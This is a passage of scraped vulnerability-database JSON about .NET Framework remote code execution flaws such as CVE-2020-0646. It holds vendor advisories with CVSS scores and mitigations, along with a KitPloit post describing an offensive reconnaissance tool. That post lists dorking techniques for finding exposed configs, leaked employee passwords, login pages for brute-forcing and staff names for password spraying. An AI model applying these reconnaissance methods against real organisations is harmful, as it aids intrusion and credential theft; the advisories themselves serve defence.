\n[CVE-2020-0602](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0602>)5.0Critical \n[CVE-2020-0605](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0605>)9.3Critical \n[CVE-2020-0606](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0606>)9.3Critical\n\n### *KB list*:\n[4535101](<http://support.microsoft.com/kb/4535101>) \n[4534306](<http://support.microsoft.com/kb/4534306>) \n[4534978](<http://support.microsoft.com/kb/4534978>) \n[4534976](<http://support.microsoft.com/kb/4534976>) \n[4532933](<http://support.microsoft.com/kb/4532933>) \n[4534276](<http://support.microsoft.com/kb/4534276>) \n[4532938](<http://support.microsoft.com/kb/4532938>) \n[4532936](<http://support.microsoft.com/kb/4532936>) \n[4534271](<http://support.microsoft.com/kb/4534271>) \n[4534979](<http://support.microsoft.com/kb/4534979>) \n[4532935](<http://support.microsoft.com/kb/4532935>) \n[4535103](<http://support.microsoft.com/kb/4535103>) \n[4535104](<http://support.microsoft.com/kb/4535104>) \n[4535105](<http://support.microsoft.com/kb/4535105>) \n[4534293](<http://support.microsoft.com/kb/4534293>) \n[4534977](<http://support.microsoft.com/kb/4534977>) \n[4535102](<http://support.microsoft.com/kb/4535102>) \n[4556826](<http://support.microsoft.com/kb/4556826>) \n[4556813](<http://support.microsoft.com/kb/4556813>) \n[4556812](<http://support.microsoft.com/kb/4556812>) \n[4556807](<http://support.microsoft.com/kb/4556807>) \n[4556406](<http://support.microsoft.com/kb/4556406>) \n[4556405](<http://support.microsoft.com/kb/4556405>) \n[4556404](<http://support.microsoft.com/kb/4556404>) \n[4556403](<http://support.microsoft.com/kb/4556403>) \n[4556402](<http://support.microsoft.com/kb/4556402>) \n[4556401](<http://support.microsoft.com/kb/4556401>) \n[4556400](<http://support.microsoft.com/kb/4556400>) \n[4556441](<http://support.microsoft.com/kb/4556441>) \n[4552929](<http://support.microsoft.com/kb/4552929>) \n[4552926](<http://support.microsoft.com/kb/4552926>) \n[4552931](<http://support.microsoft.com/kb/4552931>) \n[4556399](<http://support.microsoft.com/kb/4556399>) \n[4552928](<http://support.microsoft.com/kb/4552928>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T00:00:00", "type": "kaspersky", "title": "KLA11634 Multiple vulnerabilities in Microsoft Developer Tools", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0602", "CVE-2020-0603", "CVE-2020-0605", "CVE-2020-0606", "CVE-2020-0646"], "modified": "2020-07-17T00:00:00", "id": "KLA11634", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11634/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:58", "description": "A remote code execution vulnerability exists in Microsoft .NET Framework. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-05T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft .NET Framework Remote Code Execution (CVE-2020-0646)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-04-05T00:00:00", "id": "CPAI-2020-0216", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:27", "description": "A remote code execution vulnerability exists in Microsoft .NET Framework XPS File Parsing. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-25T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft .NET Framework XPS File Parsing Remote Code Execution (CVE-2020-0605)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-1031", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:18", "description": "[](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any [penetration testing](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation.\n\nThis tool can be used in addition to your usual approach for bug hunting. The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target.\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n**Techniques** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [sensitive information](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure.\n\n 2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources.\n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information.\n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related\n\n 5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens.\n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records.\n\n 7. Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying [default credentials](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources.\n\n 8. SQL Errors: SQL errors leaks sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection.\n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, username and passwords, the internal workings, used and referenced libraries and business logic of application.\n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files.\n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX.\n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information.\n\n 13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make attackers life easier when targeting application using newly discovered exploits.\n\n 14. Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page.\n\n 15. Install/Setup Files: Such files allows an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit.\n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues.\n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\".\n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen.\n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response.\n\n 20. GitLab: Quickly look for sensitive information on the GitLab.\n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation.\n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack.\n\n 23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration.\n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration.\n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork,\n\n 26. Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders.\n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure.\n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information.\n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow.\n\n 30. Find WordPress related exposure using Wayback Machine: Look for archieved WordPress files using WaybackMachine.\n\n 31. GitHub: Quickly look for sensitive information on the GitHub.\n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website.\n\n 33. Reddit: Information about the particular organisation on the Reddit platform.\n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation.\n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains.\n\n 36. .git Folder: Source code exposure. it's possible to download the entire repository content if accessible.\n\n 37. YouTube: Look for any recent news on Youtube.\n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures.\n\n 39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities.\n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities.\n\n 41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities.\n\n 42. Wayback Machine: Look for archived files to access old files.\n\n 43. Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation.\n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services.\n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru\n\n 46. s3 Buckets: Open s3 buckets.\n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code.\n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys.\n\n 49. Shodan: Search engine for Internet-connected devices\n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint.\n\n 51. API Endpoints: Find WSDL files.\n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes.\n\n 53. CT Logs: [Certificate Transparency](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation.\n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks.\n\n 55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research.\n\n \n**Screenshots** \n\n\nSearch for plaintext passwords for a target organisation:\n\n \n\n\n[](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation:\n\n \n\n\n[](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets:\n\n \n\n\n[](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying if the URL contains extenstion of \".do\":\n\n \n\n\n[](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n**How to use this tool?** \n\n\nStep1: Download the file from Release section: <https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe>\n\nStep2: Run the EXE file\n\nStep3: Enter the target domain\n\nStep4: Click on different buttons in the tool to find information\n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead\n\n \n**Questions?** \n\n\nTwitter: <https://twitter.com/maniarviral> \nLinkedIn: <https://au.linkedin.com/in/viralmaniar>\n\n \n**Dorking operators across Google, DuckDuckGo, Yahoo and Bing** \n\n\nTable obtained from: <https://exposingtheinvisible.org/guides/google-dorking/>\n\nHere is a table with possible dorks for various search engines.\n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. | \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. | \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. | \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. <https://en.wikipedia.org/wiki/ISO_3166-1> | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. | \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n**Contribution**\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [@ManiarViral](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n**[Download BigBountyRecon](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-18T20:30:00", "type": "kitploit", "title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2021-12-06T18:25:12", "description": "A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nTo exploit the vulnerability, an attacker would need to pass specific input to an application utilizing susceptible .Net methods.\n\nThe security update addresses the vulnerability by correcting how the Microsoft .NET Framework validates input.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Injection Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0646"], "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0646", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0646", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:13", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0606"], "modified": "2020-05-12T07:00:00", "id": "MS:CVE-2020-0606", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0606", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-06T18:25:13", "description": "A remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file.\n\nAn attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nExploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Framework. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file.\n\nThe security update addresses the vulnerability by correcting how .NET Framework checks the source markup of a file.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-14T08:00:00", "type": "mscve", "title": ".NET Framework Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0605"], "modified": "2020-06-25T07:00:00", "id": "MS:CVE-2020-0605", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0605", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-01-15T00:26:21", "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0646 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-0646"], "modified": "2020-01-14T00:00:00", "id": "SMNTC-111386", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111386", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-15T00:26:13", "description": "### Description\n\nMicrosoft .NET Framework is prone to a remote code-execution vulnerability. An attacker can leverage this issue to execute arbitrary code in the context of the currently logged-in user. Failed exploit attempts will likely result in denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft .NET Core 3.0 \n * Microsoft .NET Core 3.1 \n * Microsoft .NET Framework 3.0 SP2 \n * Microsoft .NET Framework 3.5 \n * Microsoft .NET Framework 3.5.1 \n * Microsoft .NET Framework 4.5.2 \n * Microsoft .NET Framework 4.6 \n * Microsoft .NET Framework 4.6.1 \n * Microsoft .NET Framework 4.6.2 \n * Microsoft .NET Framework 4.7 \n * Microsoft .NET Framework 4.7.1 \n * Microsoft .NET Framework 4.7.2 \n * Microsoft .NET Framework 4.8 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo mitigate the impact of a successful exploit, run the affected application as a user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of suspicious or anomalous activity. This may help detect malicious actions that an attacker may take after successfully exploiting vulnerabilities in applications. Review all applicable logs regularly.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nNever accept files from untrusted or unknown sources, because they may be malicious in nature. Avoid opening email attachments from unknown or questionable sources.\n\n**Implement multiple redundant layers of security.** \nSince this issue may be leveraged to execute code, we recommend memory-protection schemes, such as nonexecutable stack/heap configurations and randomly mapped memory segments. This tactic may complicate exploit attempts of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "symantec", "title": "Microsoft .NET Framework CVE-2020-0606 